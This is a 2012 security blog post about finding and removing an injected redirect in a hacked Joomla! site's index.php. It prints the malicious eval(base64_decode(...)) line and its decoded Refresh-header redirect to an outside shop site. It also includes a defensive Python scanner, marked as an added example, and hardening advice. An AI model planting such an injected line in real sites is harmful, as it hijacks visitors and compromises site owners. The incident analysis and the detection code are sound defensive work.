Joomla! refresh hack

Post: 1 December 2012 by kriss in: Security

Recently, one of our clients ran into issues with their Joomla! website. The website kept redirecting to another website, namely http://shopforza.info/shop, after exactly 25 seconds. Upon looking into the problem, we immediately understood that the website was just another hacked Joomla! website.

The first thing we did, after changing passwords and taking the website down before Google blacklisted it, was to turn off JavaScript to determine whether the source of the problem was one of the many pieces of JavaScript malware that sometimes make their way onto insecure websites. To our surprise, the website kept redirecting us after the same delay, but at least it was now clear that another redirect technique was being used.

Thorough inspection of the HTML source code revealed nothing interesting, or at least no <meta> refresh tag, which is what first comes to mind when thinking of a non-JavaScript redirect. But redirects may also happen at the protocol level, and indeed the network monitor was much more helpful, since we were able to capture an interesting header in the HTTP response:

Refresh: 25; url="http://shopforza.info/shop"

Let's not forget that Refresh: is a valid HTTP header, hence the need for the http-equiv attribute when you use it from a <meta> tag. With this header caught, the cause of the redirect to that website after 25 seconds suddenly became obvious. But we still had to discover where this header was being injected from.

A quick search for malicious use of the commonly abused PHP functions eval() and base64_decode() revealed that the only file concerned was index.php, at the root of the Joomla! install. Since this file is executed each time a page is shown, it's a good target for an attacker: whatever bad code it contains will be run on every request. The file contained the following line between the first two require_once() calls:

  eval(base64_decode('aGVhZGVyKCJSZWZyZXNoOiAyNTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL3Nob3BcIiIpOw=='));

Evaluating this string after base64-decoding it results, of course, in running the following code:

  header("Refresh: 25; url=\"http://shopforza.info/shop\"");
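To make both steps above repeatable (searching PHP files for eval(base64_decode(...)) and recovering what the hidden payload actually sends), here is a small scanner written for this article as an added example; it is not code from the original post or from Joomla!. It decodes every base64 payload fed to eval(), looks inside the decoded PHP for a header("Refresh: ...") call and parses the Refresh value into its delay and target URL. The sample index.php content is constructed inline from the line shown above, so the script runs offline; the function and variable names are our own.

```python
import base64
import re

# Constructed sample: a minimal index.php-like snippet carrying the injected line
# described in the post (built here for the example, not read from a real site).
SAMPLE_INDEX_PHP = r"""<?php
require_once(dirname(__FILE__) . '/includes/defines.php');
eval(base64_decode('aGVhZGVyKCJSZWZyZXNoOiAyNTsgdXJsPVwiaHR0cDovL3Nob3Bmb3J6YS5pbmZvL3Nob3BcIiIpOw=='));
require_once(dirname(__FILE__) . '/includes/framework.php');
"""

# eval(base64_decode('...')) or eval(base64_decode("...")), whitespace tolerant.
ENCODED_EVAL = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)",
    re.IGNORECASE,
)

# header("...") with a double-quoted PHP string, allowing escaped characters inside.
HEADER_CALL = re.compile(r"header\s*\(\s*\"((?:\\.|[^\"\\])*)\"\s*\)", re.IGNORECASE)

# Value of a Refresh header: "<seconds>; url=<target>" with optional quotes around the URL.
REFRESH_VALUE = re.compile(
    r"^\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)['\"]?\s*$",
    re.IGNORECASE,
)


def find_encoded_evals(php_source):
    """Return (line_number, decoded_payload) for every eval(base64_decode(...)) found.

    decoded_payload is None when the blob is not valid base64 / UTF-8."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for match in ENCODED_EVAL.finditer(line):
            raw = re.sub(r"\s+", "", match.group(2))
            try:
                decoded = base64.b64decode(raw, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                decoded = None
            findings.append((lineno, decoded))
    return findings


def parse_refresh_value(value):
    """Parse '25; url="http://..."' into (seconds, url); None if it is not a redirect."""
    match = REFRESH_VALUE.match(value)
    if not match:
        return None
    return int(match.group(1)), match.group(2)


def find_refresh_redirects(php_code):
    """Find header("Refresh: ...") calls in PHP source; return a list of (seconds, url)."""
    redirects = []
    for match in HEADER_CALL.finditer(php_code):
        # Undo the two PHP string escapes that matter here: \" and \\
        literal = match.group(1).replace('\\"', '"').replace("\\\\", "\\")
        name, sep, value = literal.partition(":")
        if sep and name.strip().lower() == "refresh":
            parsed = parse_refresh_value(value)
            if parsed:
                redirects.append(parsed)
    return redirects


def scan_php(php_source):
    """Decode every hidden eval() payload and report any Refresh redirect it sets."""
    report = []
    for lineno, decoded in find_encoded_evals(php_source):
        redirects = find_refresh_redirects(decoded) if decoded else []
        report.append({"line": lineno, "decoded": decoded, "redirects": redirects})
    return report


if __name__ == "__main__":
    for entry in scan_php(SAMPLE_INDEX_PHP):
        print(f"line {entry['line']}: {entry['decoded']}")
        for seconds, url in entry["redirects"]:
            print(f"  -> Refresh redirect after {seconds}s to {url}")
```

To run it over a real install, read each .php file under the site root and pass its content to scan_php(); any entry with a non-empty redirects list is the kind of injection described here, and every entry is worth reading regardless, since legitimate Joomla! code has no reason to eval() a base64 blob. parse_refresh_value() also works directly on a Refresh header captured from an HTTP response, as in the one shown earlier.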

Now that the source of the problem had been found, the last step was to get rid of it by removing this line and bringing the website up again to make sure that the redirect was gone. As usual, we had to investigate with the client to explain how this single line of PHP code could have been injected into a file on the server in the first place.

Although we did not discover any backdoors on the website, it turned out that our client used a very insecure administrator password, one listed among the top ten most insecure passwords, and that their website was also using some Joomla! extensions with known vulnerabilities. This combination of security weaknesses most likely led to the code injection; after we recommended uninstalling the insecure extensions and using only strong passwords, the client confirmed that the website remained clean for weeks.

If you are affected by the same problem, we hope that this article will help you solve it without too much hassle. And remember that this kind of problem can easily be prevented by using strong passwords and secure, up-to-date extensions.